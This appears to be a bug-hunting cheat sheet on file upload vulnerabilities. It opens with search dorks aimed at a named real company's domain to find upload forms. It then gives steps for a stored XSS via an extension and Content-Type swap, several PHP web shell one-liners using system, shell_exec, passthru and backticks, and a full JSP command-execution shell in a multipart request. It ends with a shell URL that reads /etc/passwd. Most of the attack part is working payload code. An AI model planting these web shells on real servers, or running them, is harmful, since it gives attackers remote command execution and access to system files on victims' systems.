Bugs in File Upload

Find RCE and XSS via upload image Name

site:.harmanaudio.com inurl:"uploadform" | intext:"choose file"
site:.harmanaudio.com inurl:"contact us" | intext:"Full Name" | intext:"First Name" | intext:Email intext:"Email Address"

Persistent XSS via Document Upload

Reproduction Steps (Persistent XSS via Document Upload):

1. Navigate to the application’s document upload feature that only allows .pdf files.

2. Upload a test file (any dummy .pdf file).

3. Start Burp Suite and enable the Intercept mode.

4. Upload the file through the application so the request is captured in Burp.

5. In the intercepted request, modify the following:

   • Change the filename extension from .pdf to .html

   • Change the Content-Type header from application/pdf to text/html

   • Replace the file content with the payload:

     <script>alert(document.domain)</script>

6. Forward the modified request to the server. Confirm that the server accepts and stores the uploaded file without validation errors.

7. Access the uploaded document through the application (e.g., view/download/open functionality).

8. Observe that the JavaScript payload executes in the browser, displaying an alert with the domain name.

9. This confirms a Persistent Cross-Site Scripting (XSS) vulnerability due to insufficient server-side file validation.

PHP and Java RCE via File Upload:

1. Upload a PHP Reverse Shell” to ".NET" OR "PHP"

2. and Observe that witch PHP functions popen() system(), shell_exec(), passthuru() were disabled and enabled this php Application

3. Craft Reverse Shell payload with that PHP function and save it into the file name shell.php if client-side validation to bypass it Shell.php.jpg

4. intercept the file upload request in burpsuite and removed the .jpg extension and forwarded the file upload request to the server.

try: <?php phpinfo(); ?>

Pyload with that system() PHP function:
<?php system("uname -a");?>
Go to path to the uploaded file: /uploadform/uploads/shell.php 
>> and see the payload fired
---------
<?php echo system($_GET['cmd']); ?>
/uploadform/uploads/shell.php?cmd=echo%20%60id%60
---------
<?php if(isset($_GET['cmd'])) {system($_GET['cmd']);}?>
/uploadform/uploads/shell.php?cmd=pwd
-----------------------------------------------------------------------------------------

Pyload with that popen() PHP function:
---------
<?php $cmd = $_GET['cmd'];echo `$cmd`;?>
/uploadform/uploads/shell.php?cmd=echo%20%60id%60

-----------------------------------------------------------------------------------------
Pyload with that passthuru() PHP function:
---------
<?php passthru("whoami");?>

-----------------------------------------------------------------------------------------
Pyload with that shell_exec() PHP function:
---------
<?php echo shell_exec('id'); ?>

If Target was running apache tomcat (Java JSP)

Shell.jsp


Content-Disposition: form-data; name="file_test"; filename="shell.jsp"
Content-Type: text/plain

<%@
page import="java.io.*"
%><%
String c=request.getParameter("cmd");
if(c!=null){
 Process p=Runtime.getRuntime().exec(c);
 BufferedReader r=new BufferedReader(new InputStreamReader(p.getInputStream()));
 String l;
 while((l=r.readLine())!=null)out.print(l+"<br>");
 r.close();
 p.waitFor();
}
%>

------geckoformboundary5f38e135054f252e2cd157230ad08b04--

Upload Url

http://example[.]com/download/tempImg/2111/product/0/1767539992247_640.jsp?cmd=cat /etc/passwd